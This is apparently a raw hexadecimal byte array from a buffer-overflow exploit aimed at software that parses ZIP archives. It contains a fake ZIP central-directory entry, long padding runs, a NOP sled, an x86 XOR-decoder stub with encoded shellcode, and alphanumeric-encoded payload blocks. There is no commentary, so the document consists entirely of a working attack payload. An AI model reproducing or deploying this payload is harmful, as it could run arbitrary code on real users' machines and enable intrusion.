0x76, 0x64, 0x73, 0x71, 0x6F, 0x69, 0x75, 0x68, 0x7A, 0x67, 0x66, 0x6F, 0x69, 0x68, 0x73, 0x64,
0x71, 0x6F, 0x69, 0x75, 0x68, 0x67, 0x7A, 0x65, 0x71, 0x6F, 0x69, 0x68, 0x67, 0x73, 0x71, 0x6F,
0x69, 0x68, 0x67, 0x7A, 0x61, 0x65, 0x7A, 0x72, 0x75, 0x79, 0x61, 0x75, 0x79, 0x74, 0x61, 0x65,
0x70, 0x69, 0x75, 0x79, 0x55, 0x59, 0x54, 0x4F, 0x5A, 0x52, 0x45, 0x50, 0x49, 0x48, 0x47, 0x41,
0x5A, 0x55, 0x59, 0x56, 0x44, 0x53, 0x4F, 0x49, 0x59, 0x54, 0x41, 0x50, 0x4F, 0x49, 0x55, 0x45,
0x59, 0x52, 0x49, 0x55, 0x45, 0x5A, 0x59, 0x47, 0x42, 0x4B, 0x4A, 0x43, 0x58, 0x4E, 0x4B, 0x56,
0x4E, 0x4B, 0x43, 0x58, 0x42, 0x57, 0x56, 0x4B, 0x4A, 0x4E, 0x42, 0x43, 0x58, 0x48, 0x42, 0x4B,
0x4A, 0x44, 0x48, 0x46, 0x4F, 0x49, 0x48, 0x5A, 0x45, 0x52, 0x4F, 0x49, 0x55, 0x48, 0x45, 0x5A,
0x55, 0x49, 0x4F, 0x41, 0x42, 0x45, 0x5A, 0x55, 0x49, 0x42, 0x47, 0x55, 0x49, 0x56, 0x43, 0x50,
0x4C, 0x44, 0x53, 0x47, 0x57, 0x4B, 0x52, 0x54, 0x42, 0x4E, 0x49, 0x55, 0x43, 0x49, 0x55, 0x4F,
0x51, 0x45, 0x42, 0x48, 0x52, 0x55, 0x49, 0x59, 0x44, 0x46, 0x51, 0x50, 0x5A, 0x49, 0x55, 0x45,
0x52, 0x50, 0x49, 0x55, 0x44, 0x59, 0x46, 0x54, 0x50, 0x41, 0x49, 0x5A, 0x55, 0x45, 0x59, 0x52,
0x5A, 0x45, 0x55, 0x48, 0x52, 0x54, 0x49, 0x55, 0x50, 0x56, 0x58, 0x57, 0x4B, 0x4A, 0x43, 0x4E,
0x48, 0x42, 0x47, 0x50, 0x46, 0x4F, 0x49, 0x55, 0x50, 0x41, 0x49, 0x52, 0x59, 0x45, 0x5A, 0x4F,
0x41, 0x49, 0x54, 0x59, 0x38, 0x37, 0x33, 0x32, 0x39, 0x35, 0x36, 0x35, 0x39, 0x34, 0x38, 0x33,
0x32, 0x36, 0x35, 0x46, 0x53, 0x34, 0x38, 0x59, 0x46, 0x44, 0x53, 0x39, 0x38, 0x59, 0x55, 0x56,
0x47, 0x30, 0x39, 0x38, 0x51, 0x59, 0x55, 0x52, 0x30, 0x39, 0x38, 0x34, 0x59, 0x35, 0x32, 0x33,
0x39, 0x38, 0x41, 0x59, 0x39, 0x46, 0x38, 0x45, 0x51, 0x59, 0x5A, 0x35, 0x39, 0x38, 0x59, 0x36,
0x39, 0x38, 0x46, 0x47, 0x59, 0x39, 0x38, 0x51, 0x59, 0x39, 0x47, 0x46, 0x44, 0x53, 0x55, 0x59,
0x30, 0x39, 0x48, 0x34, 0x5A, 0x48, 0x33, 0x37, 0x38, 0x35, 0x32, 0x33, 0x31, 0x42, 0x34, 0x47,
0x38, 0x30, 0x47, 0x46, 0x44, 0x53, 0x55, 0x49, 0x42, 0x56, 0x51, 0x49, 0x55, 0x4F, 0x59, 0x50,
0x52, 0x39, 0x5A, 0x48, 0x46, 0x44, 0x53, 0x51, 0x55, 0x49, 0x47, 0x46, 0x47, 0x44, 0x55, 0x53,
0x53, 0x53, 0x53, 0x53, 0x45, 0x47, 0x46, 0x39, 0x32, 0x47, 0x35, 0x33, 0x34, 0x55, 0x47, 0x46,
0x39, 0x49, 0x53, 0x50, 0x47, 0x42, 0x55, 0x54, 0x50, 0x5A, 0x39, 0x38, 0x59, 0x35, 0x33, 0x41,
0x41, 0x42, 0x43, 0x43, 0x46, 0x52, 0x45, 0x43, 0x43, 0x45, 0x54, 0x52, 0x45, 0x5A, 0x47, 0x52,
0x46, 0x44, 0x53, 0x49, 0x4F, 0x5A, 0x48, 0x45, 0x52, 0x42, 0x4E, 0x4F, 0x56, 0x46, 0x44, 0x53,
0x4F, 0x49, 0x52, 0x48, 0x54, 0x4F, 0x5A, 0x49, 0x4E, 0x46, 0x47, 0x44, 0x4B, 0x4E, 0x46, 0x43,
0x58, 0x4C, 0x4B, 0x59, 0x89, 0x05, 0x8A, 0x9B, 0x98, 0x98, 0x98, 0x4F, 0x49, 0x49, 0x49, 0x49,
0x49, 0x49, 0x51, 0x5A, 0x56, 0x54, 0x58, 0x36, 0x33, 0x30, 0x56, 0x58, 0x34, 0x41, 0x30, 0x42,
0x36, 0x48, 0x48, 0x30, 0x42, 0x33, 0x30, 0x42, 0x43, 0x56, 0x58, 0x32, 0x42, 0x44, 0x42, 0x48,
0x34, 0x41, 0x32, 0x41, 0x44, 0x30, 0x41, 0x44, 0x54, 0x42, 0x44, 0x51, 0x42, 0x30, 0x41, 0x44,
0x41, 0x56, 0x58, 0x34, 0x5A, 0x38, 0x42, 0x44, 0x4A, 0x4F, 0x4D, 0x4E, 0x4F, 0x4C, 0x36, 0x4B,
0x4E, 0x4D, 0x54, 0x4A, 0x4E, 0x49, 0x4F, 0x4F, 0x4F, 0x4F, 0x4F, 0x4F, 0x4F, 0x42, 0x36, 0x4B,
0x38, 0x4E, 0x46, 0x46, 0x42, 0x46, 0x42, 0x4B, 0x58, 0x45, 0x44, 0x4E, 0x43, 0x4B, 0x38, 0x4E,
0x37, 0x45, 0x30, 0x4A, 0x57, 0x41, 0x50, 0x4F, 0x4E, 0x4B, 0x48, 0x4F, 0x34, 0x4A, 0x51, 0x4B,
0x38, 0x4F, 0x45, 0x42, 0x32, 0x41, 0x30, 0x4B, 0x4E, 0x49, 0x44, 0x4B, 0x38, 0x46, 0x43, 0x4B,
0x58, 0x41, 0x50, 0x50, 0x4E, 0x41, 0x43, 0x42, 0x4C, 0x49, 0x59, 0x4E, 0x4A, 0x46, 0x58, 0x42,
0x4C, 0x46, 0x37, 0x47, 0x30, 0x41, 0x4C, 0x4C, 0x4C, 0x4D, 0x30, 0x41, 0x30, 0x44, 0x4C, 0x4B,
0x4E, 0x46, 0x4F, 0x4B, 0x33, 0x46, 0x35, 0x46, 0x32, 0x4A, 0x52, 0x45, 0x57, 0x45, 0x4E, 0x4B,
0x48, 0x4F, 0x35, 0x46, 0x42, 0x41, 0x30, 0x4B, 0x4E, 0x48, 0x36, 0x4B, 0x58, 0x4E, 0x50, 0x4B,
0x54, 0x4B, 0x48, 0x4F, 0x35, 0x4E, 0x41, 0x41, 0x30, 0x4B, 0x4E, 0x43, 0x30, 0x4E, 0x52, 0x4B,
0x58, 0x49, 0x48, 0x4E, 0x56, 0x46, 0x32, 0x4E, 0x31, 0x41, 0x36, 0x43, 0x4C, 0x41, 0x43, 0x4B,
0x4D, 0x46, 0x56, 0x4B, 0x48, 0x43, 0x44, 0x42, 0x53, 0x4B, 0x48, 0x42, 0x44, 0x4E, 0x50, 0x4B,
0x38, 0x42, 0x37, 0x4E, 0x41, 0x4D, 0x4A, 0x4B, 0x48, 0x42, 0x44, 0x4A, 0x30, 0x50, 0x45, 0x4A,
0x36, 0x50, 0x38, 0x50, 0x44, 0x50, 0x30, 0x4E, 0x4E, 0x42, 0x35, 0x4F, 0x4F, 0x48, 0x4D, 0x48,
0x46, 0x43, 0x45, 0x48, 0x56, 0x4A, 0x46, 0x43, 0x43, 0x44, 0x33, 0x4A, 0x56, 0x47, 0x37, 0x43,
0x37, 0x44, 0x43, 0x4F, 0x55, 0x46, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x36, 0x4B, 0x4C, 0x4D,
0x4E, 0x4E, 0x4F, 0x4B, 0x33, 0x42, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4F, 0x45, 0x49, 0x58, 0x45,
0x4E, 0x48, 0x56, 0x41, 0x48, 0x4D, 0x4E, 0x4A, 0x50, 0x44, 0x30, 0x45, 0x35, 0x4C, 0x36, 0x44,
0x50, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x36, 0x49, 0x4D, 0x49, 0x50, 0x45, 0x4F, 0x4D, 0x4A, 0x47,
0x45, 0x4F, 0x4F, 0x48, 0x4D, 0x43, 0x55, 0x43, 0x45, 0x43, 0x35, 0x43, 0x35, 0x43, 0x35, 0x43,
0x54, 0x43, 0x55, 0x43, 0x54, 0x43, 0x35, 0x4F, 0x4F, 0x42, 0x4D, 0x48, 0x46, 0x4A, 0x56, 0x41,
0x41, 0x4E, 0x45, 0x48, 0x56, 0x43, 0x45, 0x49, 0x48, 0x41, 0x4E, 0x45, 0x59, 0x4A, 0x46, 0x46,
0x4A, 0x4C, 0x31, 0x42, 0x57, 0x47, 0x4C, 0x47, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4C, 0x36, 0x42,
0x41, 0x41, 0x35, 0x45, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x56, 0x46, 0x4A, 0x4D, 0x4A, 0x50,
0x32, 0x49, 0x4E, 0x47, 0x35, 0x4F, 0x4F, 0x48, 0x4D, 0x43, 0x55, 0x45, 0x45, 0x4F, 0x4F, 0x42,
0x4D, 0x4A, 0x56, 0x45, 0x4E, 0x49, 0x54, 0x48, 0x58, 0x49, 0x44, 0x47, 0x45, 0x4F, 0x4F, 0x48,
0x4D, 0x42, 0x35, 0x46, 0x55, 0x46, 0x55, 0x45, 0x55, 0x4F, 0x4F, 0x42, 0x4D, 0x43, 0x39, 0x4A,
0x36, 0x47, 0x4E, 0x49, 0x47, 0x48, 0x4C, 0x49, 0x57, 0x47, 0x45, 0x4F, 0x4F, 0x48, 0x4D, 0x45,
0x55, 0x4F, 0x4F, 0x42, 0x4D, 0x48, 0x46, 0x4C, 0x56, 0x46, 0x36, 0x48, 0x36, 0x4A, 0x56, 0x43,
0x46, 0x4D, 0x36, 0x49, 0x48, 0x45, 0x4E, 0x4C, 0x46, 0x42, 0x45, 0x49, 0x35, 0x49, 0x32, 0x4E,
0x4C, 0x49, 0x38, 0x47, 0x4E, 0x4C, 0x56, 0x46, 0x34, 0x49, 0x58, 0x44, 0x4E, 0x41, 0x43, 0x42,
0x4C, 0x43, 0x4F, 0x4C, 0x4A, 0x50, 0x4F, 0x44, 0x54, 0x4D, 0x32, 0x50, 0x4F, 0x44, 0x34, 0x4E,
0x52, 0x43, 0x39, 0x4D, 0x38, 0x4C, 0x37, 0x4A, 0x33, 0x4B, 0x4A, 0x4B, 0x4A, 0x4B, 0x4A, 0x4A,
0x56, 0x44, 0x57, 0x50, 0x4F, 0x43, 0x4B, 0x48, 0x41, 0x4F, 0x4F, 0x45, 0x37, 0x46, 0x44, 0x4F,
0x4F, 0x48, 0x4D, 0x4B, 0x45, 0x47, 0x45, 0x44, 0x55, 0x41, 0x35, 0x41, 0x45, 0x41, 0x35, 0x4C,
0x36, 0x41, 0x30, 0x41, 0x55, 0x41, 0x45, 0x45, 0x45, 0x41, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A,
0x46, 0x4D, 0x4A, 0x49, 0x4D, 0x45, 0x30, 0x50, 0x4C, 0x43, 0x55, 0x4F, 0x4F, 0x48, 0x4D, 0x4C,
0x36, 0x4F, 0x4F, 0x4F, 0x4F, 0x47, 0x43, 0x4F, 0x4F, 0x42, 0x4D, 0x4B, 0x48, 0x47, 0x45, 0x4E,
0x4F, 0x43, 0x58, 0x46, 0x4C, 0x46, 0x46, 0x4F, 0x4F, 0x48, 0x4D, 0x44, 0x45, 0x4F, 0x4F, 0x42,
0x4D, 0x4A, 0x56, 0x42, 0x4F, 0x4C, 0x48, 0x46, 0x50, 0x4F, 0x45, 0x43, 0x55, 0x4F, 0x4F, 0x48,
0x4D, 0x4F, 0x4F, 0x42, 0x4D, 0x5A, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x41, 0x49, 0x89, 0x04, 0x02, 0x12, 0x01, 0x61, 0x82, 0xFD, 0x81, 0x98, 0x98, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x2E, 0x74,
0x78, 0x74, 0x50, 0x4B, 0x01, 0x02, 0x14, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB7, 0xAC,
0xCE, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x08,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45,
0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x45, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,
0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x41, 0x42, 0x43, 0x44, 0x45, 0x58, 0x58, 0x58, 0x58, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x31, 0xC9, 0x83, 0xE9, 0xB0, 0xD9, 0xEE, 0xD9, 0x74,
0x24, 0xF4, 0x5B, 0x81, 0x73, 0x13, 0x50, 0x8A, 0xFA, 0x90, 0x83, 0xEB, 0xFC, 0xE2, 0xF4, 0xAC,
0xE0, 0x11, 0xDD, 0xB8, 0x73, 0x05, 0x6F, 0xAF, 0xEA, 0x71, 0xFC, 0x74, 0xAE, 0x71, 0xD5, 0x6C,
0x01, 0x86, 0x95, 0x28, 0x8B, 0x15, 0x1B, 0x1F, 0x92, 0x71, 0xCF, 0x70, 0x8B, 0x11, 0xD9, 0xDB,
0xBE, 0x71, 0x91, 0xBE, 0xBB, 0x3A, 0x09, 0xFC, 0x0E, 0x3A, 0xE4, 0x57, 0x4B, 0x30, 0x9D, 0x51,
0x48, 0x11, 0x64, 0x6B, 0xDE, 0xDE, 0xB8, 0x25, 0x6F, 0x71, 0xCF, 0x74, 0x8B, 0x11, 0xF6, 0xDB,
0x86, 0xB1, 0x1B, 0x0F, 0x96, 0xFB, 0x7B, 0x53, 0xA6, 0x71, 0x19, 0x3C, 0xAE, 0xE6, 0xF1, 0x93,
0xBB, 0x21, 0xF4, 0xDB, 0xC9, 0xCA, 0x1B, 0x10, 0x86, 0x71, 0xE0, 0x4C, 0x27, 0x71, 0xD0, 0x58,
0xD4, 0x92, 0x1E, 0x1E, 0x84, 0x16, 0xC0, 0xAF, 0x5C, 0x9C, 0xC3, 0x36, 0xE2, 0xC9, 0xA2, 0x38,
0xFD, 0x89, 0xA2, 0x0F, 0xDE, 0x05, 0x40, 0x38, 0x41, 0x17, 0x6C, 0x6B, 0xDA, 0x05, 0x46, 0x0F,
0x03, 0x1F, 0xF6, 0xD1, 0x67, 0xF2, 0x92, 0x05, 0xE0, 0xF8, 0x6F, 0x80, 0xE2, 0x23, 0x99, 0xA5,
0x27, 0xAD, 0x6F, 0x86, 0xD9, 0xA9, 0xC3, 0x03, 0xD9, 0xB9, 0xC3, 0x13, 0xD9, 0x05, 0x40, 0x36,
0xE2, 0xEB, 0xCC, 0x36, 0xD9, 0x73, 0x71, 0xC5, 0xE2, 0x5E, 0x8A, 0x20, 0x4D, 0xAD, 0x6F, 0x86,
0xE0, 0xEA, 0xC1, 0x05, 0x75, 0x2A, 0xF8, 0xF4, 0x27, 0xD4, 0x79, 0x07, 0x75, 0x2C, 0xC3, 0x05,
0x75, 0x2A, 0xF8, 0xB5, 0xC3, 0x7C, 0xD9, 0x07, 0x75, 0x2C, 0xC0, 0x04, 0xDE, 0xAF, 0x6F, 0x80,
0x19, 0x92, 0x77, 0x29, 0x4C, 0x83, 0xC7, 0xAF, 0x5C, 0xAF, 0x6F, 0x80, 0xEC, 0x90, 0xF4, 0x36,
0xE2, 0x99, 0xFD, 0xD9, 0x6F, 0x90, 0xC0, 0x09, 0xA3, 0x36, 0x19, 0xB7, 0xE0, 0xBE, 0x19, 0xB2,
0xBB, 0x3A, 0x63, 0xFA, 0x74, 0xB8, 0xBD, 0xAE, 0xC8, 0xD6, 0x03, 0xDD, 0xF0, 0xC2, 0x3B, 0xFB,
0x21, 0x92, 0xE2, 0xAE, 0x39, 0xEC, 0x6F, 0x25, 0xCE, 0x05, 0x46, 0x0B, 0xDD, 0xA8, 0xC1, 0x01,
0xDB, 0x90, 0x91, 0x01, 0xDB, 0xAF, 0xC1, 0xAF, 0x5A, 0x92, 0x3D, 0x89, 0x8F, 0x34, 0xC3, 0xAF,
0x5C, 0x90, 0x6F, 0xAF, 0xBD, 0x05, 0x40, 0xDB, 0xDD, 0x06, 0x13, 0x94, 0xEE, 0x05, 0x46, 0x02,
0x75, 0x2A, 0xF8, 0x2E, 0x52, 0x18, 0xE3, 0x03, 0x75, 0x2C, 0x6F, 0x80, 0x8A, 0xFA, 0x90, 0x00,
0x69, 0x4A, 0x58, 0x43, 0x53, 0x35, 0x70, 0x43, 0x4B, 0x4E, 0x70, 0x4F, 0x78, 0x4A, 0x4F, 0x38,
0x4E, 0x6B, 0x30, 0x43, 0x30, 0x63, 0x38, 0x65, 0x48, 0x4B, 0x4E, 0x71, 0x7A, 0x7A, 0x6E, 0x50,
0x57, 0x39, 0x6F, 0x79, 0x57, 0x31, 0x53, 0x42, 0x4D, 0x6F, 0x74, 0x6E, 0x4E, 0x61, 0x55, 0x51,
0x68, 0x61, 0x55, 0x6B, 0x70, 0x4E, 0x4F, 0x70, 0x63, 0x6B, 0x70, 0x52, 0x4E, 0x4F, 0x75, 0x71,
0x64, 0x6D, 0x50, 0x52, 0x55, 0x70, 0x73, 0x71, 0x55, 0x50, 0x72, 0x6D, 0x50, 0x25, 0x73, 0x6B,
0x70, 0x25, 0x73, 0x6D, 0x50, 0x6E, 0x4F, 0x51, 0x31, 0x4F, 0x54, 0x4E, 0x64, 0x6F, 0x30, 0x6D,
0x56, 0x4D, 0x56, 0x4D, 0x50, 0x70, 0x6E, 0x4F, 0x75, 0x72, 0x54, 0x4D, 0x50, 0x30, 0x6C, 0x42,
0x4F, 0x71, 0x53, 0x33, 0x31, 0x50, 0x6C, 0x43, 0x37, 0x70, 0x72, 0x70, 0x6F, 0x62, 0x55, 0x30,
0x70, 0x6B, 0x70, 0x6F, 0x51, 0x6F, 0x74, 0x50, 0x6D, 0x6F, 0x79, 0x50, 0x6E, 0x31, 0x59, 0x54,
0x33, 0x70, 0x74, 0x54, 0x32, 0x61, 0x51, 0x50, 0x74, 0x70, 0x6F, 0x31, 0x62, 0x42, 0x53, 0x6B,
0x70, 0x25, 0x73, 0x4D, 0x50, 0x4E, 0x4F, 0x4F, 0x51, 0x61, 0x34, 0x6F, 0x54, 0x6B, 0x50, 0x41,
0x00, 0x4B, 0x38, 0x4F, 0x45, 0x42, 0x32, 0x41, 0x30, 0x4B, 0x4E, 0x49, 0x44, 0x4B, 0x38, 0x46,
0x43, 0x4B, 0x58, 0x41, 0x50, 0x50, 0x4E, 0x41, 0x43, 0x42, 0x4C, 0x49, 0x59, 0x4E, 0x4A, 0x46,
0x58, 0x42, 0x4C, 0x46, 0x37, 0x47, 0x30, 0x41, 0x4C, 0x4C, 0x4C, 0x4D, 0x30, 0x41, 0x30, 0x44,
0x4C, 0x4B, 0x4E, 0x46, 0x4F, 0x4B, 0x33, 0x46, 0x35, 0x46, 0x32, 0x4A, 0x52, 0x45, 0x57, 0x45,
0x4E, 0x4B, 0x48, 0x4F, 0x35, 0x46, 0x42, 0x41, 0x30, 0x4B, 0x4E, 0x48, 0x36, 0x4B, 0x58, 0x4E,
0x50, 0x4B, 0x54, 0x4B, 0x48, 0x4F, 0x35, 0x4E, 0x41, 0x41, 0x30, 0x4B, 0x4E, 0x43, 0x30, 0x4E,
0x52, 0x4B, 0x58, 0x49, 0x48, 0x4E, 0x56, 0x46, 0x32, 0x4E, 0x31, 0x41, 0x36, 0x43, 0x4C, 0x41,
0x43, 0x4B, 0x4D, 0x46, 0x56, 0x4B, 0x48, 0x43, 0x44, 0x42, 0x53, 0x4B, 0x48, 0x42, 0x44, 0x4E,
0x50, 0x4B, 0x38, 0x42, 0x37, 0x4E, 0x41, 0x4D, 0x4A, 0x4B, 0x48, 0x42, 0x44, 0x4A, 0x30, 0x50,
0x45, 0x4A, 0x36, 0x50, 0x38, 0x50, 0x44, 0x50, 0x30, 0x4E, 0x4E, 0x42, 0x35, 0x4F, 0x4F, 0x48,
0x4D, 0x48, 0x46, 0x43, 0x45, 0x48, 0x56, 0x4A, 0x46, 0x43, 0x43, 0x44, 0x33, 0x4A, 0x56, 0x47,
0x37, 0x43, 0x37, 0x44, 0x43, 0x4F, 0x55, 0x46, 0x45, 0x4F, 0x4F, 0x42, 0x4D, 0x4A, 0x36, 0x4B,
